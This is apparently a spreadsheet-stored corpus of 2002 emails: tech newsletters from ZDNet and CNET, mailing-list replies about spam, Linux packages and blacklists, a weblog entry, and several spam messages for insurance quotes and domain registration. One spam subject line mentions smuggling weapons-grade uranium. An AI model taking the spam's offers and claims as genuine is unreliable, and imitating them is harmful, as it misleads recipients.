 dth=3D1&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#999999"&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 wi=
 dth=3D1&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;/table&gt;      &lt;!-- /### --&gt; &lt;table cellpadding=3D10=
  border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D3b-XhxVINdxK73KLocFPcZsjpRp-LrR"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://clickthru.online.com/Click?q=3D50-M_CBIR0cwuMR3rVASOnO8CtmMgRR" &gt;&lt;b&gt;Gate=
 s tells all... Cheap PCs from Gateway... Sony's tiny digicam&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Bil=
 l Gates shares his views on the top tech issues in his very own e-mail news=
 letter. Plus: Gateway entices back-to-school buyers with cheap PCs. And is =
 Sony's mini-digital camera a must-have fashion accessory? &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D65-K82zIDP9dzcjCb6D70VOf0m8P9ZR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_your.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/445.gif" alt=3D"DAVID MORGENSTERN" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D7b-prT_IBZzg9pymhxbDr4q1O7VpJcR" &gt;&lt;b&gt;Wann=
 a speed up your  Web surfing? Here's how&lt;/b&gt;&lt;/a&gt;&lt;br&gt;You dial-up Web surfers=
  are always trying to speed up your connections--which is why you like the =
 Propel service David Coursey recommended. But it's not the only way to figh=
 t the World Wide Wait. David sums up your suggestions. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
         =20
        =20
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D90-wHZMQ_IMRUGOilkVb8HYULuonXiR" &gt;&lt;b&gt;Quic=
 kPoll results: Would you pay $129 to upgrade to OS X 10.2?&lt;/b&gt; &lt;/a&gt;&lt;/font&gt;&lt;=
 p&gt;
        =20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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID BERLIND&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/390.gif" alt=3D"DAVID BERLIND" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Da5-DyaHQ7Z=
 FSQfhrDLsIC1b2OB8OEPR" &gt;&lt;b&gt;Hey thief! You just TRY stealing this notebook&lt;/=
 b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif=
 " width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Lay a hand on David's notebook, and it emits an unstoppable=
 , ear-piercing screech. Sound like a good way to prevent notebook theft? Da=
 vid thinks so, too. That's why he's been using the Caveo Anti-Theft securit=
 y system.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;table cellpadding=3D0 cellspacing=3D0 =
 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;JOHN MORRIS AND JOSH TAYLOR&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/143.gif" alt=3D"JOHN MORRIS AND JOSH TAYLOR" border=3D"0"&gt;&lt;=
 br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dba-m-45QXp=
 JTf--cSfxhOmI_uIUEknR" &gt;&lt;b&gt;What's new in reviews: The eMac--and more&lt;/b&gt;&lt;/a=
 &gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" wid=
 th=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 After two long years, John is taking leave from Hits and Hy=
 pe. But never fear, the column lives on with Josh. In their final effort to=
 gether, the duo runs down the most notable products--such as the new eMac--=
 on ZDNet this week.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3Dcf-ebM-QLw=
 1uM7KdhhJaylIO7r3fxeR" &gt;&lt;b&gt;Lights, camera...My favorite movie screensavers!=
 &lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.g=
 if" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Love the movies? Wish you could be watching one instead of =
 sitting at your PC? Preston's got a way to bring Hollywood to your desktop =
 (well, almost): movie screensavers. Here are three of his top picks.&lt;/font&gt;=
 &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3De4-ABYFQVkP42B758jI81u0PT_=
 Qv1yR" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3Df9-mtKTQxOPE_9THbNSM_svdGheo-lR"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rl_login?email=3Dqqqqqqqqqq-zdnet@example.com&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3D0f-RMDlzIj=
 P98iKk79xZKuhSsxF6QnuusRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@example.com&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3D24-8DdMIczi7xAqCI6geUef92iqrwyR" &gt;FAQ&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D39-7QgMIjIiV=
 xMFTUCCGLs-y39w-_lR"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href=3D"http://clickthru.online.com/Click?q=3D4e-0Y95InZ3=
 acWu6aJIKlsTn8N_Jj9R" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D63-tPKjIHWGw06jVWtg_9-h=
 wkp_WEcR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3D78-d5asIdUkHx8ILqR5vnMUN5xspoRR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D8d-nbL1Q7nmvnT=
 HOhpIiSupcptbPMPR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3Da2-6-M7QXZHFzG_b-K9R0CGk_HtsonR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3Db7-FOgPQ8JHOqrx2qz0NpbnpTbdL3eR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3Dcc-h4fQQ0O796GQRq67qeZDo=
 zn6f5yR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
 online.com/Click?q=3De2-J1OpQhyI6RJ7KKBENBEZdihv9KnR" style=3D"color: #fff"=
 &gt;Hardware&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3Df7-N0QnQLg=
 ImSfFjWNlrZIGiR6ImOeR"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NL=3De501-01&amp;ISSUE=3D2002-07-22" height=3D1 width=3D1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;=
 tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, sans-serif size=3D2&gt;   =
  &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;=20
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3D0d-3=
 a5unDr3Rb82CjV756XJrJ8XisRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 22 Aug 2002, Lucas Gonze wrote:
 &gt;
 &gt; Political mail (the snail kind) doesn't bother me.  I like it a lot of the
 &gt; time, because as crap as it is at least it's not the kind of info you get
 &gt; on TV.  Particularly for small time local politics, it's the best way to
 &gt; get information.
 Except that thanks to the magic of spam, it's usually some else's locale
 &gt; but what matters is that mail is speech, and political email has to be as
 &gt; well protected as any other political speech.  Spam is *the* tool for
 &gt; dissident news, since the face that it's unsolicited means that recipients
 &gt; can't be blamed for being on a mailing list.
 A terrible argument. There are better technical solutions to privacy
 protection than sending a copy of the same message to everyone on the
 Internet, so the recipients can't be blamed for reading it.
 Wait till phone spam is as cheap to send as email spam...
 Dan
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000619
 Date: 2002-09-30T00:33:14-06:00
 Anyone have a copy of Gill Sans or Bell Centennial I can borrow? I wonder if 
 I'll ever have $250 to spend on fonts. *Update:* Kevin Marks[1], who is 
 stupendously incredible for far more things than I can list here points out 
 that it's _included with OS X_. I knew Mac OS X included a lot of grat fonts[2]
 , but I don't know how I overlooked this. (Matthew Carter, I'd be happy to pay 
 you the two cents in royalties you probably get for selling $100 worth of 
 fonts.) 
 Tufte notes: Terrie Miller[3]. 
 First ammendement beer bash. 
 iSync Beta[4] (guess they learned a lesson from iCal) is out.
 [1] http://epeus.blogspot.com
 [2] http://www.apple.com/macosx/features/font.html
 [3] http://www.oreillynet.com/~terrie/tufte/
 [4] http://www.apple.com/isync/
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "Adam L. Beberg" &lt;beberg@mithral.com&gt;
 &gt;
 &gt; Memory management is a non-issue for anyone that has any idea at all how
 the
 &gt; hardware functions.
 In theory there is no difference between theory and practice. In practice
 there is.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 21 Jul 2002 14:50:13 -0400
 che &lt;che666@uni.de&gt; wrote:
 &gt; On 21 Jul 2002 23:59:59 +1200
 &gt; Mark Derricutt &lt;mark@talios.com&gt; wrote:
 &gt; 
 &gt; &gt; On Mon, 2002-07-22 at 06:20, che wrote:
 &gt; &gt; 
 &gt; &gt; &gt; The server mentioned above works again now :)!
 &gt; &gt; 
 &gt; &gt; Any problems with the rpm's they provided?
 &gt; &gt; 
 &gt; &gt; 
 &gt; &gt; _______________________________________________
 &gt; &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; 
 &gt; #redhat 7.3
 &gt; rpm http://apt.sunnmore.net gnome2 73
 &gt; rpm-src http://apt.sunnmore.net gnome2 73
 &gt; 
 &gt; #redhat 7.2
 &gt; rpm http://apt.sunnmore.net gnome2 72
 &gt; rpm-src http://apt.sunnmore.net gnome2 72
 &gt; 
 &gt; thats the correct lines to be added to sources.list for the repository
 &gt; 
 &gt; i just did a apt-get install gnome-session its still progressing :)
 &gt; 
 after apt-get install gnome-session
 i did another apt-get upgrade (25 more packages) and it works now... i am in gnome 2.0 wohooooo :) looks very great very "tidy" only error message i got was about a mixer applet on login (no biggie to me) even the old sawfish still works. yet its great and works cant say anythign negative yet :)
 just btw. if someone knows any other nice repositorys please post em :).
 thanks in advance,
 che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</si>
  <si>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Subject: Life Insurance Quotes Without the Hassle...            JHIWNS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</si>
  <si>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href=3D"http://insurancequotesource.com/user0202/termquotes/473400/"&gt;&lt;font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href=3D"http://insurancequotesource.com/user0202/termquotes/473400/
 "&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;&lt;br&gt;&lt;br&gt;
 &lt;a
 href=3D"http://marketing-fashion.com/light/watch.asp"&gt;to be
 excluded from future contacts &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 m_d_serv
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Photoshop Theme.. ways to smuggle weapons-grade Uranium .
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8390120,1717/
 Date: 2002-09-30T11:09:22+01:00
 (Doc Brown)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 8 Aug 2002, kevin lyda wrote:
 &gt; the more the merrier
 indeed.
 &gt; - makes it harder for spammers to do their work. however, tmda isn't
 &gt; an smtp proxy normally.
 well, smtp being store and forward, what is an smtp proxy? :) that's 
 why i said "proxy".
 probably, the most effective way to stop spam in the long-term is to 
 configure your email server to use the SPEWS blacklist and a good open 
 relay blacklist.
 SPEWS: to force ISPs to take action against spammers 
 SPEWS /will/ list entire ISP netblocks /if/ the ISP consistently
 ignores/fails to take action on abuse reports over the course of
 several months. however, they're pretty quick at delisting once action
 is taken. in the long-term, and in absence of global and effective 
 anti-UCE regulations, it's the only realistic way to get to a spam 
 free internet.
 Open relay lists: to protect against relays obviously.
 &gt; kevin
 regards,
 -- 
 Paul Jakma	Sys Admin	Alphyra
 	paulj@alphyra.ie
 Warning: /never/ send email to spam@dishone.st or trap@dishone.st
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: domain names now only $14.95
</t>
  </si>
  <si>
    <t xml:space="preserve">PUBLIC ANNOUNCEMENT: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http://www.affordable-domains.com today for more info.
 Register your domain name today for just $14.95 at: http://www.affordable-domains.com/  Registration fees include full access to an easy-to-use control panel to manage your domain name in the future.
 Sincerely,
 Domain Administrator
 Affordable Domains
 To remove your email address from further promotional mailings from this company, click here:
 http://www.centralremovalservice.com/cgi-bin/domain-remove.cgi
 45
 9588xeOa0-732ENqv9875eRMa4-664oWoA0829MnbA5-849OhZo1243goAl55
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.CONTEXT: Adios to options excess?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;CNET | News.context&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#e5e5e5"&gt;
 &lt;center&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;!-- Logo and ad banner --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
     &lt;td width=442 colspan=4 bgcolor="#e5e5e5"&gt;
         &lt;img src="http://home.cnet.com/i/ne/ds/nched.gif" alt="" width="442" height="63" border="0"&gt;&lt;br&gt;
     &lt;/td&gt;
     &lt;td width=160 rowspan=2 align=center&gt;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href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw80dUMJaylIO7r3fxeR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jKR51bI81u0PT_Qv1yR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOPEQl3HGqSM_svdGheo-lR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0e--eOTIiQIux9UGHx4r8dJx98lbK4R" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINMjnMu30qQiAv2Y9ZZvQKrR"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width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="5" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=252&gt;
 	&lt;tr&gt;
 	&lt;td&gt;&lt;img src="http://home.cnet.com/i/ne/ds/nc.gif" alt="News.context" width="76" height="16" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 &lt;!-- Date --&gt;
 	&lt;td align=right&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 18, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	&lt;p&gt;
 		&lt;img src="http://news.cnet.com/i/ne/pr/gr/prtease_cooper.gif" width="65" height="82" border="0" align="right"&gt;&lt;b&gt;Adios to options excess?&lt;/b&gt;&lt;p&gt;
 		&lt;b&gt;If the nation's politicians expect Silicon Valley to fall in line on the issue of expensing stock options, they're living in a fantasy world.&lt;/b&gt;
 		&lt;p&gt;
 		Flipping through my Rolodex this past week, I couldn't find one solitary technology type willing to support even the mildest proposal to change how corporations account for stock options. The more common response was a verbal "middle finger" shouted in the general direction of Washington.
 		&lt;p&gt;
 		No surprises, there. The options argument is not just about putting food on the table--make that &lt;i&gt;a lot&lt;/i&gt; of food, in some cases--but about the way the computer industry views itself. Tech companies believe they belong in a different category, say, from the likes of Coca Cola, Washington Post Co. and Bank One Corp.--all which recently decided to begin expensing stock options.
 		&lt;p&gt;
 		Tech titans also served notice they will remember to support friends--and shun foes--in Washington next November. An empty threat? Perhaps, but consider this: in the last national election, the computer industry contributed more than $40 million (52 percent to Democrats, 46 percent to Republicans.) That was good for a seventh place &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjIiVpWATh6CGLs-y39w-_lR" &gt;ranking&lt;/a&gt;, according to the Center for Responsive Politics.
 		&lt;p&gt;
 		&lt;a href="mailto:charles.cooper@cnet.com"&gt;Charlie Cooper&lt;/a&gt;, Executive Editor/Commentary&lt;br&gt;
 		&amp;nbsp;&lt;br&gt;
 	&lt;/font&gt;&lt;/td&gt;
    &lt;td width=5&gt;&lt;img src="http://home.cnet.com/b.gif" alt="" width="5" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;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&lt;b&gt;Why the options party is over&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Transamerica Investment Management portfolio manager &lt;b&gt;Kenneth Broad&lt;/b&gt; says
 it's easy to see why the tech industry is fighting so hard to keep options from
 being expensed: no one likes to lose a free lunch.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZ3aFMx6avIKlsTn8N_Jj9R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;We can handle CEO cheats&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The Bush administration has crafted its own proposals for dealing with excess and dishonesty in corporate life. Commerce Undersecretary &lt;b&gt;Phil Bond&lt;/b&gt;, who spoke with CNET News.com, believes the President's plan is just the ticket to get executives to come clean.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=63-tPKjIHWGwVXQyQag_9-hwkp_WEcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Why free downloads help, not hurt&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Recording artist &lt;b&gt;Janis Ian&lt;/b&gt; throws down the gauntlet to the National Academy of Recording Arts &amp; Sciences (home of the Grammy Awards) and the Recording Industry Association of America. Making the case for the salutary benefits of free digital downloads, she says the music industry is dancing to the wrong beat.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpw7wgNf7Wx31g9NPmdZPuR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;A CTO's worst nightmare&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 After the Sept. 11 terrorist attacks, anxious investors worried when the stock market's largest financial exchange would open again. New York Stock Exchange CTO &lt;b&gt;Roger Burkhardt&lt;/b&gt; was on the job faster than a trader can say "buy." &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JpxwU19k5VFm8il40AWNyR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Fact and fiction in the Web services debate&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Sun versus Microsoft, Java versus .Net, McNealy versus Gates. Does it all really matter, Iona Technologies CEO &lt;b&gt;Barry Morris&lt;/b&gt; asks, when it comes down to what users want. The future of Web services, Morris says, is being held hostage amid a fruitless debate over industry politics.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZJdj5MdcnGkeHaXeD3gBlR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Rewiring the FBI for the 21st century&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 When it comes to the digital age, the FBI is stuck with tools left over from the old days. That's why the FBI is hoping for big things from its new CIO. &lt;b&gt;Darwin John&lt;/b&gt; tells CNET News.com about his plans for revitalizing the Bureau's dated IT infrastructure. But this long-time outsider must first learn to navigate his way through the bureau's treacherous bureaucracy.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKVBmn18c3T_PUCch20Lg4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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href="http://clickthru.online.com/Click?q=cb-CjRIQJsQXvpFnq2yXYHRf_uaHkrR" &gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=e0-cImRr_DMnm8vSwzxPTqRo-V2vp1gVRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwH2EXwoup6DmLwgkaZmRPR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrwX4rr3lwBwhq6GOxuYznR"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href="http://clickthru.online.com/Click?q=20-PoiFIRzIPyi4Yy5tR-pp7us2QfiR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIIbyHo1vSKNXLTSyPWc3PR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpX0UOE-ERsxoLkkTKhn-dR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKc1ZSX76i6fez6pa6cIJuR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZG-VLiWy_RYG8Y0gSPZxsR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J2r6qPDqrkUMBXB6W5WWlR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e432&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=9f-o7QM-LJnEHsSQaqj_ZbxyO4ipdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Insight on the News Email Edition
</t>
  </si>
  <si>
    <t xml:space="preserve">INSIGHT NEWS ALERT!
 A new issue of Insight on the News is now online
 http://insightmag.com/news/258763.html
 ...............................................
 Folks, the summer=92s upon us here in the nation=92s capital. And, matchi=
 ng the=20
 weather, your representatives are heatedly working to improve the Wall St=
 reet=20
 mess. Let=92s hope they don=92t make it worse. Jennifer Hickey tells all =
 in her=20
